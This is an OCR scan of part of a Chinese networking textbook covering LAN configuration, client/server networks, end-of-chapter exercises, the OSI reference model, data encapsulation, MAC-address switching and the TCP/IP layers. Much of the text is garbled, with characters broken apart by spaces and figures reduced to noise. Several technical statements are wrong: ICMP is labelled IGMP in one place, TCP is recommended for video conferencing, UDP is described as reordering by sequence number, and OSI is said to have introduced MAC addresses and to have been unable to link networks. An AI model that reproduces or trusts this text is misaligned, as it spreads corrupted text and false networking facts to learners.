人 @ 陋 用 下 而 区 还 地 球 本 了 加 使 用 下 面 的 TP 地 址 G): 
IP 地 址 I) 92 .168 .1 .10 于 地 址 CL) 192 .168 .1 .11 
子 网 掩 码 255 .255 .255 .0 子 网 掩 码 四 255 .255 .255 . 0 
默认 网 关 四) 默认 网 关中 ) ET 
主机 1 配置 主机 2 配置 


图 1-15 对 等 网 主机 的 配置 


@ ”IP 地 址 可 以 分 为 网 络 号 和 主机 号 ,同一 局 域 网 主机 网 络 号 相同 ,主机 号 不 一 样 ,就 像 同 个 班 的 学 生 , 班 号 相同 ， 
学 号 各 异 ,彼此 之 间 通 过 查询 名 肌 表 (Mac 地 址 表 ) 相 互通 信 。 
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(2) 客户 /服务 器 网 络 

客户 机 /服务 器 简称 C/S(Client/Server) 网 络 模式 。 在 C/S 中 ,提供 服务 (如 文件 服务 、 
打印 服务 .邮件 服务 .存储 服务 ) 的 计算 机 称 为 服务 器 ,而 享用 服务 的 计算 机 称 为 客户 机 。 客 
户 机 /服务 器 模式 适用 于 组 建 流量 较 大 、 结 构 复杂 的 局 域 网 和 广域网 。 例 如 ,校园 网 中 提供 
资源 下 载 的 计算 机 称 为 FTP 服务 器 ,提供 校内 邮件 转发 的 计算 机 称 为 邮件 服务 器 ,而 学 生 
的 计算 机 享用 这 些 服务 , 称 为 客户 机 。 


本 章 小 结 


本 章 学 习 了 计算 机 网 络 的 定义 、 功 能 和 分 类 以 及 组 建 对 等 网 络 和 局 域 网 的 方法 ,在 这 里 
重点 要 理解 计算 机 网 络 的 4 个 分 类 标准 。 学 生 应 通过 自学 方式 对 当前 计算 机 网 络 发 展 和 趋 
势 做 更 深入 的 了 解 。 本 章 知 识 结构 如 图 1-16 所 示 。 


局 域 网 
域 网 
按 地 理 位 置 划 并 


广域网 
计 
. 
及 星 形 
的 | 按 地 网 络 拓扑 划分 4 环形 
入 树 型 
网 状 弄 
对 等 网 


:资源 共享 方 2 
按 资源 共 方式 划分 训 机 / 服 条 器 


图 1-16 本 章 知识 结构 图 


思考 练习 题 

一 、 填空 题 

1. 按照 地 域 覆盖 范围 ,可 将 计算 机 网 络 分 为 ` 城 域 网 和 广域网 。 

2. 计算 机 网 络 按 其 拓扑 结构 可 以 划分 为 总 线 型 \ 星 形 、 环 形 、 树 型 和 ,其 中 用 
交换 机 组 成 的 局 域 网 属于 拓扑 结构 ,Internet 属于 拓扑 结构 。 

3. 数据 在 传输 过 程 中 ,传输 速率 与 线 缆 长 度 呈 比 , 线 缆 长 度 越 长 ,传输 速率 越 

4. 三 网 融合 是 指 将 和 紧密 融合 实现 统一 的 网 络 。 

二 、 选 择 题 

1. 下 列 有 关 网 络 技术 的 发 展 趋势 的 描述 中 ,不 正确 的 是 


A. 计算 机 网 络 的 数据 传输 速率 将 越 来 越 大 
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Cn 


Le | 


B. 计算 机 网 络 的 主要 特征 为 资源 共享 
C. 网 络 信息 交换 将 以 高 速度 的 电路 交换 为 主要 特征 
D. 网 络 协议 向 标准 化 ,网 络 服务 向 综合 化 发 展 


. 计算 机 网 络 发 展 到 现在 , 共 经 历 了 个 阶段 。 
js | B. 2 局 D. 4 
. 网 络 之 间 互 联 , 其 目的 是 
A. 实现 互联 网 上 资源 共享 B. 提高 网 络 工作 效率 
C. 提高 网 络 传输 速率 D. 使 用 更 多 的 网 络 操作 系统 
. 最 早出 现 的 计算 机 互联 网 络 是 
A. 阿 帕 网 B. 以 太 网 C. 因特网 D. 局 域 网 
.局域网 主机 之 间 的 通信 是 基于 
A. Mac 地 址 B. IP 地 址 C. 主机 名 称 D. 工作 组 名 
、 简 答题 
. 什么 是 计算 机 网 络 ? 
. 简 述 总 线 型 网 络 拓扑 结构 的 特点 。 


. 简 述 星 形 网 络 拓扑 结构 的 优点 和 应 用 。 
. 计算 机 网 络 的 发 展 可 以 划分 为 几 个 阶段 ? 每 个 阶段 各 有 什么 特点 ? 


第 2 章 计算 机 网 络 体系 结构 


计算 机 网 络 体系 是 一 种 高 度 结构 化 层次 模型 。 所 谓 结构 化 ,是 指 将 一 复杂 庞大 系统 分 
解 成 若干 子 系统 ,各 个 子 系统 间 相 互 独立 ,各 司 其 职 ,但 同时 又 相互 联系 ,共同 构成 一 个 整 
体 。 本 章 主要 讲述 计算 机 网 络 系统 分 层 思想 ,引入 OSI 参考 模型 和 TCP/IP 参考 模型 ,最 后 
对 两 种 网 络 模型 进行 比较 。 

(1) 理解 网 络 分 层 的 目的 。 

(2) 识 记 OSI 参考 模型 各 层 功能 。 

(3) 理解 OSI 参考 模型 和 TCP/IP 参考 模型 的 区 别 。 


2.1 OSI 参考 模型 


2.1.1 邮政 系统 


网 络 系统 分 层 的 目的 在 于 把 庞大 复杂 的 问题 分 解 成 若干 子 问 题 局 部 解决 ,其 思想 起 源 
于 邮政 系统 。 为 简化 信件 投递 过 程 ,人 们 将 邮政 系统 划分 为 四 个 子 层 ,如 图 2-1 所 示 。 在 第 
一 层 中 , 写 信者 不 需 亲自 将 信件 送 至 对 方 , 而 是 通过 “通信 者 活动 ”将 信件 粘贴 邮票 ,投递 至 
邮箱 中 ,至 此 发 信者 任务 完成 ,把 剩余 工作 交 由 下 层 “ 邮 局 服务 业务 ”;“ 邮 局 服务 业务 ”将 信 
件 盖 截 分 拣 , 完 成 本 层 任 务 后 再 把 剩余 工作 交 由 下 层 * 邮 局 转送 业务 ";“ 邮 局 转送 业务 ?将 
发 送 给 同一 地 区 的 信件 打包 ,再 交 由 最 底层 “运输 部 门 ”;“ 运 输 部 门 ”负责 传输 信件 ,抵达 目 
的 邮局 中 再 一 层 一 层 向 上 传达 ,最 后 通过 邮递 员 投 递 到 收 件 者 邮箱 中 。 


全 中 发 信者 收 信者 
贴 邮票 上 -= | 通信 者 活动 通信 者 活动 | 一 一 | 阅读 信件 
送 邮 票 _| EE 
收集 信件 一 1 加 
基 邮 秦 |- [局 服务 业务 | 。 [局 服务 业务 | 一 一 信 休 淮 间 
信件 分 拣 _j| |_ 信 件 分 拒 
二 js 
信件 打包 天 要 分 发 邮件 
过 信人 二 全 | 区 局 竺 关 业 和 局 竺 二 务 一 | 名 f 昕 包 
路 由 选择 | ! | 转送 邮局 
运输 | ~ 运输 部 门 的 邮件 运输 业务 一 | 捞 收 邮包 


图 2-1 邮政 系统 分 层 结 构图 
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在 邮政 系统 中 ,信件 要 投递 成 功 ,双方 各 层 必须 事先 约定 相同 的 行为 准则 。 在 计算 
机 网 络 中 ,为 实现 不 同 网 络 、 不 同 设备 之 间 的 数据 传输 ,也 必须 遵守 相应 标准 和 规范 ,将 
其 称 为 网 络 模型 。 基 于 此 思想 ,1984 年 国际 标准 化 组 织 ISO (International Standards 
Organization) 提出 了 OSICOpen System Interconnection Basic Reference Model) 开放 系统 互 
联 参考 模型 。 


2.1.2 OSI 参考 模型 简介 


1. OSI 参考 模型 的 七 层 架 构 

OSI 开放 系统 互联 参考 模型 0 将 计算 机 网 络 系统 划分 为 七 层 。 其 中 ,高 三 层 与 应 用 程 
序 或 具体 应 用 相关 ; 低 三 层 与 数据 通信 相关 ; 传输 层 是 低 三 层 与 高 三 层 的 过 渡 层 ,也 称 为 
中 间 层 , 既 与 应 用 相关 ,又 与 通信 相关 ,如 图 2-2 所 示 。 发 送 方 通过 应 用 层 程 序 输 入 图 文 信 
息 , 交 由 下 层 表示 层 (由 操作 系统 完成 ) 转 变 为 二 进 制 编码 ,再 依次 逐 层 下 达 至 会 话 层 、 传 输 
层 等 ,直到 物理 层 , 将 比特 流转 换 为 信号 ,通过 传输 介质 抵达 目的 物理 层 , 再 逐 层 上 达 提 交 给 
应 用 层 相 应 程序 ,完成 数据 的 传输 。 这 里 要 注意 以 下 几 点 。 


发 送 方 叔 接收 方 如 


应 用 层 应 用 层 


表示 层 ”| / 高 三 层 
i 
会 话 导 会 话 层 
传输 层 ” | 中间 层 
1 
网 络 层 


数据 链 路 层 数据 链 路 层 
1 外 
物理 层 所 


图 2-2 OSI 参考 模型 


(1) 对 等 实体 
相同 层 实体 叫 作 对 等 实体 ,对 等 实体 必须 遵守 同 层 协议 。 例 如 发 送 方 网 络 层 和 接收 方 


@ 开放 是 指 任何 国家 或 地 区 的 计算 机 都 可 使 用 该 标准 ,只 要 遵循 该 标准 的 计算 机 都 可 以 接 入 网 络 相 互通 信 。 

互联 是 指 不 同系 统 之 间 的 连接 ,如 不 同 厂商 计算 机 之 间 的 互联 ,不 同 操作 系统 之 间 的 互联 (如 Windows 系统 和 
Linux 系统 ) ,不 同 接 入 设备 之 间 的 互联 (如 计算 机 与 手机 )。 

参考 并 不 是 指 特定 的 技术 或 规范 ,而 是 指 对 某 一 实现 标准 的 支持 。 例 如 ,物理 层 需要 传输 比特 ,并 没有 指定 具体 的 
传输 介质 (如 双 绞 线 、 电 话 线 或 光纤 ) ,而 是 只 要 能 将 计算 机 的 比特 流传 输 至 对 方 即 可 ,具体 传输 方法 和 形式 由 各 个 厂商 
实现 。 又 如 ,在 具体 传输 中 , 双 绞 线 将 "1”、…“0” 比 特 转换 为 正 负电 平 数字 信号 ,电话 线 将 1"、…“0” 比 特 转 换 为 高 低频 率 的 
模拟 信号 ,光纤 将 *1"“0" 比 特 转换 为 有 光 和 无 光 的 光 信号 ,这 些 都 是 实现 技术 ,而 OSI 并 不 是 指 这 些 具体 的 实现 技术 ， 
而 是 指 只 要 能 传输 比特 即 可 ,而 不 管 采取 何 种 传输 手段 。 
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网 络 层 属于 对 等 实体 ,发 送 方 物理 层 和 接收 方 物理 层 也 属于 对 等 实体 ,对 等 实体 间 必 须 遵 守 
实现 约定 ,如 数据 包头 何 处 存放 源 IP、 何 处 存放 目的 IP、 何 处 起 表示 数据 ,否则 会 导致 数据 
无 法 识别 。 

(2) 实体 通信 

对 等 实体 间 不 能 相互 通信 ,而 是 处 理 后 交付 下 一 层 ,最 后 由 物理 介质 实现 通信 ; 如 发 送 
方 的 传输 层 不 能 把 数据 直接 发 送 给 接收 方 的 传输 层 , 而 是 在 本 层 对 数据 加 工 后 交付 网 络 层 ， 
再 一 层 层 下 达 , 交 由 物理 层 的 传输 介质 抵达 对 方 物理 层 。 

(3) 各 层 规则 

相 邻 两 层 之 间 存 在 服务 与 被 服务 关系 ,上 层 调用 下 层 服 务 , 下 层 为 上 层 提 供 服务 ,例如 
网 络 层 调 用 数据 链 路 层 服务 ,数据 链 路 层 为 网 络 层 服务 。 但 是 , 非 邻居 层 之 间 不 存在 服务 与 
被 服务 的 关系 ,如 网 络 层 和 物理 层 之 间 由 于 不 能 直接 通信 ,没有 服务 与 被 服务 关系 。 

OSI 参考 模型 将 网 络 系统 划 为 7 层 , 对 等 实体 之 间 遵 循 同 层 协议 ,因此 从 本 质 上 讲 OSI 
制定 了 数据 传输 的 一 系列 协议 标准 ,是 一 个 庞大 的 协议 集 。 

2. 什么 是 协议 (Protocol) 

协议 是 通信 双方 的 约定 和 规则 ,如 究 竞 是 将 正 电 平 定义 为 数据 *1” 还 是 将 负电 平定 义 为 
数据 *1”, 是 将 IP 地 址 定义 为 32 位 还 是 48 位 ,假如 收发 双方 不 事先 协商 定义 ,会 导致 彼此 
数据 无 法 识别 。 协 议 由 三 要 素 组 成 ,分 别 是 语法 .语义 和 同步 。 

(1) 语法 : 网 络 中 传输 的 数据 和 控制 信息 的 结构 和 形式 。 例 如 IP 数据 包 由 多 少 字 节 组 
成 ,第 几 字 节 存放 源 地 址 .第 几 字 节 存 放 目 的 地 址 等 格式 定义 。 

(2) 语义 : 对 完成 某 种 功能 的 响应 和 动作 。 例 如 接收 方 每 接收 一 帧 数据 后 ,回复 应 答 
信息 给 发 送 方 ,告知 本 帧 数据 已 经 接收 ,准备 接收 下 一 帧 数据 ,这 种 应 答 被 称 为 语义 。 

(3) 同步 : 对 实现 某 种 功能 的 处 理 顺序 。 例 如 发 送 方 和 接收 方 要 传输 大 量 数据 ,双方 
必须 事先 建立 连接 ,再 维持 连接 传输 数据 ,传输 完毕 后 最 后 拆除 连接 ,双方 的 步 又 顺序 必须 
保持 一 致 , 称 为 同步 。 

3. OSI 各 层 功 能 概述 

(1) 应 用 层 。 应 用 层 是 OSI 参考 模型 的 最 高 层 , 它 是 计算 机 与 用 户 之 间 的 接口 。 应 用 
层 由 操作 系统 和 应 用 程序 组 成 ,为 用 户 访问 网 络 提供 可 视 化 界面 。 例 如 ,QQ 应 用 程序 用 于 
网 络 聊 天 ,浏览 器 用 于 浏览 网 页 。 

(2) 表示 层 。 表 示 层 用 于 对 语法 和 数据 格式 进行 转换 ,负责 应 用 程序 与 网 络 之 间 的 翻 
译 转换 ,包括 数据 加 密 、 压 缩 、 格 式 转换 等 。 例 如 ,在 QQ 程序 里 面 输入 信息 “你 好 ”, 必 须 通 
过 表示 层 转 变 为 计算 机 能 识别 的 二 进 制 编码 “0” 和 “1”0。 

(3) 会 话 层 。 会 话 层 负 责 建立 ,维持 ,终止 网 络 两 节点 端 与 端 之 间 的 通信 ,协调 双方 主 
机 会 话 连接 。 例 如 ,一 方 发送 另 一 方 就 要 做 好 接收 准备 ,是 甲 发 送 给 乙 还 是 乙 发 送 给 甲 ,会 
话 层 是 管理 双方 的 会 话 关系 。 


@ ”信息 是 人 能 识别 的 ,如 文字 、 图 像 、 声 音 等 ,数据 是 计算 机 能 识别 的 二 进 制 编码 ,计算 机 需要 将 信息 转变 为 数据 
才能 进行 处 理 。 对 于 英文 字符 可 对 照 ASCII 表 转 变 成 相应 二 进 制 编码 ,如 字符 "A" 的 ASCII 为 65,65 转变 为 二 进 制 就 是 
1000001; 字符 “你 好 ”通过 汉字 编码 如 GB2312 简体 汉字 编码 量化 为 数值 后 再 转变 为 二 进 制 
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(4) 传输 层 。 传 输 层 基 于 网 络 层 服务 。 网 络 层 实现 的 是 双方 主机 之 间 的 连接 ,而 发 送 
方 传输 数据 ,不 仅仅 要 发 送 到 对 发 主机 ,还 要 发 送 至 相应 的 应 用 进程 。 例 如 ,只 有 把 信息 “你 
好 ”发 送 到 对 方 主机 的 QQ 应 用 进程 ,对 方 QQ 才 会 提示 接收 到 新 消息 。 为 此 ,操作 系统 通 
过 序号 标识 每 个 应 用 进程 , 称 为 端口 号 。 浏 览 器 端口 号 为 80,FTP 端口 号 为 21,QQ 端口 号 
为 8000。 传 输 层 在 原 报 文 附加 上 端口 号 ,实现 双方 主机 应 用 进程 之 间 的 逻辑 连接 , 即 端 到 
端 连接 。 

(5) 网 络 层 。 网 络 层 最 基本 功能 是 寻 径 ,通过 路 由 算法 寻找 从 源 主 机 至 目的 主机 之 间 
的 最 佳 路 径 ,实现 双方 主机 之 间 的 逻辑 连接 中 。 

(6) 数据 链 路 层 。 数 据 链 路 层 为 网 络 层 提 供 服务 ,例如 网 络 层 已 经 计算 出 田 一 @ 一 加 
路 径 是 最 佳 路 径 ,数据 链 路 层 将 @@@@ 中 间 节 点 走 通 ,建立 和 维持 数据 链 路 ,因此 数据 链 路 
层 也 被 称 为 点 到 点 连接 , 即 中 间 节 点 和 中 间 节 点 之 间 的 连接 。 只 有 数据 链 路 层 将 中 间 节 点 
连接 起 来 ,提交 给 网 络 层 ,网 络 层 才能 实现 双方 主机 之 间 的 连接 。 

(7) 物理 层 。 物 理 层 为 双方 主机 提供 必要 物理 连接 以 透明 传输 比特 流 。 所 谓 透明 ,是 
指 用 户 不 需要 关心 数据 是 如 何 调制 成 数字 信号 或 模拟 信和 号、 如 何在 网 络 中 传输 中 继 ,这 些 复 
杂 的 过 程 对 用 户 来 说 是 透明 的 。 


2.1.3 数据 封装 与 拆 封 
在 OSI 参考 模型 中 ,数据 每 经 一 层 都 要 进行 封装 或 解 封 。 封 装 是 将 数据 添加 相应 控制 
信息 以 便 下 一 层 能 识别 并 做 出 处 理 。 拆 封 是 封装 的 逆 过 程 ,下 层 把 数据 中 的 控制 信息 去 除 


交 由 上 一 层 叫 作 拆 封 。 
如 图 2-3 所 示 , 在 OSI 参考 模型 中 数据 的 封装 过 程 如 下 。 


Enum 应 用 层 | 信息 
[EE | Helo | 表示 层 。 | 表示 层 报 文 


eo] 会 话 层 “| 会 话 层 报 广 
[nan 上 | 传输 层 报 广 

| im THelo] 

[IE 头 厦 末 TI ”THelio| 帧 尾 


JUUUUUUUUUUUUUL Ca | tes 


图 2-3 数据 封装 图 


网 络 层 


数据 链 路 层 


(1) 用 户 要 发 送信 息 “ 你 好 ”, 应 用 程序 为 用 户 访问 网 络 提供 可 视 化 界面 ,并 在 用 户 输入 
的 信息 上 加 入 文本 控制 报头 AH ,封装 成 应 用 层 数据 单元 交 给 表示 层 。 


@ 所谓 逻辑 连接 ,并 不 是 指 真 实 的 物理 通路 ,例如 路 由 器 通过 计算 数据 包 目 的 地 址 选择 @ 一 加 一 四 这 条 通路 , 属 
于 逮 辑 连接 ,就 像 出 发 时 告知 先 坐 3 路 车 再 转 5 路 车 最 后 坐 2 路 车 一 样 , 属 于 逻辑 通路 。 
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(2) 表示 层 接收 到 应 用 层 数 据 , 依 据 上 层 AH 标识 将 信息 转换 为 文本 二 进 制 编码 ,加 上 
本 层 控 制 报头 PH ,封装 成 表示 层 数据 单元 交 给 会 话 层 。 

(3) 会 话 层 收 到 后 同样 加 上 本 层 控制 报头 SH ,封装 成 会 话 层 数据 单元 交 给 传输 层 。 

(4) 传输 层 收 到 后 加 上 控制 包头 TH( 如 源 端 口号 、 目 的 端口 号 等 信息 ) ,封装 成 数据 报 
交 给 网 络 层 。 

(5) 传输 层 整 个 报 文 长 度 与 要 发 送 的 信息 长 度 相关 。 报 文 过 长 不 利于 实际 传输 , 报 文 
部 分 出 错 还 会 导致 整个 报 文 的 重 传 。 因 此 ,在 网 络 层 接收 到 传输 层 的 报 文 后 ,将 其 分 割 成 若 
干 个 较 短 的 数据 段 ,对 每 个 数据 段 加 上 控制 包头 NH( 如 原 IP 地 址 、 目 的 IP 地 址 等 信息 )， 
封装 成 数据 包 交 付 给 数据 链 路 层 。 

(6) 当 数 据 链 路 层 接收 到 数据 包 后 ,在 每 个 数据 包 前 后 加 上 帧 头 和 帧 尾 控制 信息 DH 
(如 Mac 地址、 纠 错 码 等 ) ,将 数据 包 封装 成 数据 帧 , 交 给 物理 层 。 另 外 , 当 封 装 成 数据 帧 后 ， 
每 个 数据 帧 通过 帧 头 和 帧 尾 彼 此 间 开 ,以 便 接收 方 识别 。 

(7) 物理 层 将 接收 到 的 数据 帧 转换 为 比特 流 ,利用 电磁 或 光 编码 成 数字 信号、 模拟 信号 
和 光 信 号 ,通过 介质 传输 至 目的 主机 。 

目的 计算 机 物理 层 识别 信号 得 到 比特 流 , 交 付 数据 链 路 层 ; 数据 链 路 层 去 除 帧 头 和 由 
尾 得 到 数据 包 交付 网 络 层 ; 网 络 层 将 接收 到 的 数据 包 去 除 控制 包头 ,并 根据 数据 包 序号 重 
组 还 原 成 完整 报 文 交 由 传输 层 , 这 样 一 层 一 层 向 上 传达 ,最 后 得 到 信息 “你 好 ”并 提交 给 相应 
应 用 进程 。 在 每 层 中 ,接收 方 去 掉 本 层 控 制 信息 以 供 上 层 识 别 并 处 理 , 称 为 拆 封 。 然 而 ,对 
用 户 来 说 ,这 一 切 都 是 透明 的 ,用 户 不 需要 干预 封装 拆 封 的 具体 过 程 , 这 也 是 OSI 参考 模型 
分 层 的 目的 。 


2.1.4 OSI 参考 模型 提出 的 背景 和 不 足 


第 三 代 计 算 机 网 络 出 现 以 前 ,由 于 缺乏 统一 标准 和 协议 , 故 不 同 厂商 生产 的 计算 机 是 不 
能 相互 通信 的 。 当 时 ,只 能 在 小 范围 内 将 同 种 类 型 计算 机 实现 互联 。 随 着 主机 数量 的 增多 ， 
如 何在 大 范围 内 将 所 有 计算 机 互联 成 统一 网 络 呢 ?为 解决 这 个 问题 ,国际 标准 化 组 织 提出 
了 OSI 参考 模型 ,首次 引入 Mac 物理 地 址 。 实 现 方法 是 对 不 同 厂 商 的 接 入 设备 用 全 球 唯 一 
的 Mac 地 址 标识 ,主机 启动 时 主动 向 交换 机 提交 自己 的 Mac 地 址 。 此 后 ,交换 机 通过 查询 
“Mac 一 端口 "映射 表 转 发 数据 帧 ,这 样 Mac 地 址 屏蔽 了 不 同 厂 商 之 间 的 硬件 差异 ,实现 不 
同类 型 计算 机 的 互联 ,如 图 2-4 所 示 。 

在 OSI 参 考 模型 实现 不 同 计算 互联 后 ,ARPANET 上 的 主机 数量 从 早期 的 几 十 台 增 加 
到 上 千 台 ,OSI 也 试图 将 计算 机 通过 唯一 的 交换 设备 连接 起 来 实现 互联 互通 。 但 是 , 随 着 网 
络 中 计算 机 数量 的 倍增 ,交换 设备 要 从 成 千 上 万 条 记录 中 找到 映射 关系 会 带 来 很 大 迟延 。 
因此 ,OSI 参 考 模型 只 能 在 小 范围 内 将 计算 机 互联 ,组 成 以 太 网 ,相当 于 现在 的 局 域 网 ,网 络 
和 网 络 之 间 不 能 相互 通信 。 

由 于 OSI 参考 模型 不 能 实现 异 构 网 络 主机 之 间 的 互联 ,因此 极 大 阻碍 了 其 应 用 和 发 
展 。 但 是 ,其 作为 一 个 功能 完整 .逻辑 严密 的 体系 结构 ,特别 是 对 网 络 分 层 而 治 的 思想 ,很 什 
得 借鉴 和 学 习 。 
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交换 机 
地 址 映射 表 


端口 号 Mac 地 址 
© 00-00-5A-3C-69-84 | < 一 一 
[0 00-00-37-9A-82-6C 
四 
@ 


寺 泪 


00-35-5A-32-7B-8F 
00-5B-3B-52-85-6A 


交换 机 端口 映射 表 


全 || 寺 泪 


A B C D 
00-00-5A-3C-69-84 00-00-37-9A-82-6C 00-35-5A-32-7B-8F 00-5B-3B-52-85-6A 


图 2-4 ”Mac 地 址 转发 原理 图 


EL 
如 何 查 看 主机 Mac 物理 地 址 
Mac 物理 地 址 共 6 组 48 个 bit, 前 24 个 bit 用 于 全 球 分 配给 不 同 厂商 ,后 24 个 bit 用 于 
厂商 分 配给 不 同 网 卡 ,从 而 保证 每 张 网 卡 Mac 地 址 全 球 的 唯一 性 。 在 网 卡 出 厂 时 ,将 Mac 


地 址 固化 其 内 ,不 可 更 改 。 但 是 ,可 在 Dos 界面 输入 命令 “ipconfig/All” 查 看 网 卡 的 Mac 地 
址 ,如 图 2-5 所 示 。 


命令 提示 符 [- [olxl 
Ethernet adapter 本 地 连接: 


Connection-specific DNS Suffix 


Description . 。 。。。 。 。 。。 。 UMware fccelerated AMD Adapter | 
[Physical Address. . . - . - . - BB-BC-29-55-22-2D 

Dhep Enabled- - - 。 。 。 - 。。 No 

IP Address. - 。- 。- 。 。。 。 。 192-168-1-19 

Subnet Hask - 。 。 。 。。 - 。 。 255-255-255-B 


~ 
Dl » 


图 2-5 查看 主机 Mac 物理 地 址 


2.2 TCP/IP 参考 模型 


面 对 OSI 参考 模型 的 不 足 , 将 OSI 的 高 三 层 ( 应 用 层 、 标 识 层 和 会 话 层 ) 定 义 为 应 用 
因为 这 三 层 都 与 操作 系统 和 基于 操作 系统 的 应 用 程序 有 关 ; 将 物理 层 和 数据 链 路 层 定 义 为 
网 络 接 口 层 ,因为 这 两 层 都 与 具体 通信 相关 ; 其 余 层次 不 变 。 


* 讽 
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1. 网 络 接口 层 

网 络 接口 层 集 物理 层 和 数据 链 路 层 两 者 功能 于 一 身 ,负责 建立 \、 维 持 和 释放 链 路 ,合理 
分 配 、 利 用 传输 介质 ,以 便 正 确 发 送 、 传 输 和 接收 数据 帧 。 在 网 络 接口 层 , 对 应 的 协议 有 
HDLC 高 级 链 路 控制 协议 .PPP 点 对 点 协议 2 和 SLIP 串 行 线路 网 际 协议 9 。 

2. 网 际 层 

网 际 层 也 称 为 网 络 层 或 网 络 互联 层 , 它 是 整个 TCP/IP 参考 模型 的 核心 ,负责 对 报 文 进 
行 分 片 重组 .路 由 选择 和 拥塞 控制 。 传 输 层 报 文 如 果 太 长 则 在 实际 中 并 不 利于 传输 ,网 际 
层 需要 把 传输 层 报 文 编号 分 组 ,再 对 每 个 数据 包 单 独 寻 址 投递 ,因此 分 片 后 数据 包 会 沿 
不 同 路 径 抵达 目的 主机 ,不 可 避免 地 会 产生 错 序 乱 序 问题 ,但 是 接收 方 只 需 根 据 数据 包 
序号 重组 即 可 还 原 成 初始 报 文 。 此 外 ,网 际 层 还 要 负责 流量 控制 .拥塞 控制 和 检测 重 传 
等 任务 。 

IP 协议 是 网 际 层 重要 协议 , 它 定义 了 因特网 中 所 有 计算 机 相互 通信 时 应 当 遵 循 的 准 
则 。 任 何 厂家 生产 的 计算 机 系统 ,不 管 采用 何 种 接 入 设备 、 何 种 操作 系统 ,只 要 遵循 IP 协议 
都 可 以 相互 通信 。IP 协议 包含 4 个 子 协议 ,分 别 是 ICMP 报 文 控制 协议 IGMP 组 播 协议 、 
ARP 地 址 解析 协议 和 RARP 逆向 地 址 解析 协议 。 

(1) ICMP(Internet Control Message Protocol) 报 文 控制 协议 用 于 传送 IP 控制 信息 。 
网 际 层 数 据 包 经 过 多 个 路 由 器 转发 可 能 会 出 现 拥塞 、 丢 包 \ 目 标 不 可 达 等 现象 。 为 了 在 出 现 
问题 时 能 及 时 通知 发 送 方 并 做 出 响应 ,网 际 层 引入 IGMP 报 文 控制 协议 ,用 于 向 发 送 方 转 
达 网 络 是 否 通畅 目的 是 否 可 达 、 路 由 是 否 可 用 等 路 径 信 息 , 其 对 数据 传输 起 重要 作用 ,其 中 
ping 命令 就 是 基于 ICMP 协议 。 

(2) IGMP(Internet Group Management Protocol) 组 播 协 议 用 于 网 联 设 备 之 间 群 发 路 
径 状 态 信 息 , 如 路 径 是 否 拥 塞 、 目 标 是 否 可 达 、 路 径 开 销 大 小 等 ,避免 因 广播 带 来 的 安全 性 和 
拥塞 问题 。 

(3) ARP (Address Resolution Protocol) 地 址 解析 协议 用 于 将 目标 IP 转换 为 物理 地 
址 。 由 于 局 域 网 内 部 主机 之 间 基 于 Mac 地 址 通信 , 故 源 主机 发 送 数据 前 必须 先 广播 ARP 
请 求 查 询 目 的 节点 Mac 地 址 ,目的 节点 接收 到 后 做 出 响应 并 返回 其 Mac 地 址 信息 ,由 此 发 
送 方 可 以 获得 目的 Mac 地 址 并 与 之 通信 。 局 域 网 利用 ARP 地 址 解析 协议 对 双方 主机 的 通 
信 进 行 约定 和 规范 。 

(4) RARP(Reverse Address Resolution Protocol) 逆 向 地 址 解析 协议 用 于 将 本 机 Mac 
地 址 转换 为 IP 地 址 。 例 如 无 盘 工 作 站 不 能 存储 自身 全, 启动 时 广播 RARP 查询 请 求 ,服务 
器 收 到 后 响应 请 求 , 并 根据 工作 站 Mac 地 址 返回 事先 与 之 绑 定 的 IP 地 址 。 


@ HDLC(High-Level Data Link Control) 高 级 数据 链 路 控制 协议 用 于 封装 和 处 理 数据 帧 ,提供 帧 标志 ( 帧 头 帧 尾 的 
标识 )、 帧 校 验 . 帧 控制 等 字段 。 

加 “PPP(Pointto-Point Protocol) 点 到 点 协议 是 通过 拨号 或 专线 方式 提供 点 到 点 连接 ,封装 .处 理 和 传输 数据 帧 。 
利用 调制 解 调 器 接 人 网 络 的 计算 机 通常 使 用 点 对 点 协议 或 SLIP 协议 封装 IP 数据 包 , 调 制 成 模拟 型 号 通过 电话 线 传输 
至 目的 节点 。 

图 SLIP(Serial Line Internet Protocol) 串 行 线路 网 际 协 议 是 一 种 简单 的 数据 帧 封装 协议 , 它 是 Windows 远程 访问 
中 一 种 旧 的 面向 低速 串 行 线路 的 工业 标准 ,在 Unix 服务 器 中 还 会 使 用 到 该 协议 。 


19 


网 络 技术 基础 与 安全 


3. 传输 层 

传输 层 负 责 将 报 文 传输 至 目标 主机 进程 ,实现 双方 主机 进程 之 间 的 通信 。 为 满足 不 同 
场合 需求 ,传输 层 定义 了 两 种 传输 协议 ,分 别 是 TCP(Transmission Control Protocol) 传输 
控制 协议 和 UDP(CUser Datagram Protocol) 用 户 数据 报 协 议 。 

TCP 是 一 种 可 靠 的 、 面 向 连接 协议 ,数据 传输 前 必须 先 建立 连接 ,数据 包 按照 先进 先 出 
的 原则 抵达 至 目的 节点 ,不 存在 丢 包 乱 序 现象 ,适用 于 传输 大 量 的 .可靠 性 和 实时 性 要 求 较 
高 的 场合 ,如 视频 会 议 、 网 络 电 话 、 网 页 浏览 等 。 

UDP 是 一 种 不 可 靠 的 、 无 连接 协议 ,传输 时 数据 包 沿 不 同 路 径 各 自 计 算 路 由 并 投递 , 抵 
达 目 的 节点 后 再 按照 序号 重组 还 原 成 完整 的 报 文 交付 应 用 进程 。 其 不 可 靠 性 体现 在 中 间 转 
发 节点 不 需 对 数据 包 检 错 确认 ,不 关心 数据 包 最 终 能 否 抵 达 、 数 据 包 有 无 出 错 丢 失 等 现象 ， 
只 是 尽 最 大 努力 投递 。 用 UDP 用 户 数据 报 协 议 传输 数据 简单 灵活 ,并 可 减少 建立 连接 所 
带 来 的 延迟 ,适用 于 少量 、 可 靠 性 要 求 不 高 的 场合 ,如 短 消息 发 送 、 网 络 聊天 等 。 

4. 应 用 层 

TCP/IP 参考 模型 将 OSI 的 会 话 层 和 表示 层 合并 到 应 用 层 。 应 用 层 位 于 协议 栈 顶 层 ， 
主要 负责 为 用 户 访问 网 络 提供 可 视 化 界面 。 应 用 层 基 本 协议 有 HTTP、FTP、DNS、DHCP、 
NAT 等 ,具体 请 参阅 后 续 章 节 。TCP/IP 参考 模型 的 各 层 功 能 和 协议 见 表 2-1。 


表 2-1 TCP/IP 参考 模型 各 层 功能 和 协议 


层次 名 称 功 能 协 议 
建立 和 维持 连接 ,合理 分 配 利用 传输 介 HDLC( 高 级 数据 链 路 控制 协议 ) 
网 络 接口 层 | 质 ,对 应 OSI 参考 模型 的 物理 层 和 数据 PPP( 点 对 点 协议 ) 
链 路 层 SLIP( 串 行 线路 网 际 协议 ) 
IP( 网 际 协议 ) 
